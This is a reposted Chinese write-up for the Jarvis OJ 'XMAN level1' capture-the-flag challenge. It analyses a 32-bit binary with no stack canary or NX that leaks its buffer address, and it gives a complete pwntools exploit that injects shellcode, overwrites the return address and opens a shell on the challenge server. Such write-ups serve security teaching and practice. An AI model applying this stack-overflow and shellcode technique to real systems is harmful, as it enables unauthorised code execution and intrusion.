码迷,mamicode.com
首页 > 编程语言 > 详细

Jarvis OJ - [XMAN]level1 - Writeup

时间:2017-09-25 22:56:48      阅读:322      评论:0      收藏:0      [点我收藏+]

标签:nbsp   技术分享   color   contex   log   function   打印   执行   style   

Jarvis OJ - [XMAN]level1 - Writeup

M4x原创,转载请表明出处http://www.cnblogs.com/WangAoBo/p/7594173.html

题目:

技术分享

分析

  • checksec检查保护机制如下,NX没开,可以通过执行shellcode来get shell

    技术分享

  • 拖到IDA中,查看函数的流程,vulnerable_function函数打印了缓冲区的起始地址,read可以读取0x100个字符,而buf到ret的偏移为0x88 + 0x4 < 0x100,而该elf又是No canary found。

    技术分享

    ?

    技术分享

  • 整理一下现有的信息:

    • 长度为0x100的缓冲区
    • 缓冲区的起始地址
    • 没有打开栈保护和NX保护

    因此,可以把shellcode填到以buf为起始地址的缓冲区里,并控制vulnerable_function返回到shellcode,就可以通过执行shellcode拿到shell

  • ?

步骤

  • 经过如上分析,写出exp如下:

 1 #!/usr/bin/env python
 2 # -*- coding: utf-8 -*-
 3 __Auther__ = M4x
 4 
 5 from pwn import *
 6 context(log_level = debug, arch = i386, os = linux)
 7 
 8 shellcode = asm(shellcraft.sh())
 9 #  io = process(‘./level1‘)
10 io = remote(pwn2.jarvisoj.com, 9877)
11 text = io.recvline()[14: -2]
12 #  print text[14:-2]
13 buf_addr = int(text, 16)
14 
15 payload = shellcode + \x90 * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)
16 io.send(payload)
17 io.interactive()
18 io.close()

 

 

运行exp,拿到flag

技术分享

 

Jarvis OJ - [XMAN]level1 - Writeup

标签:nbsp   技术分享   color   contex   log   function   打印   执行   style   

原文地址:http://www.cnblogs.com/WangAoBo/p/7594173.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!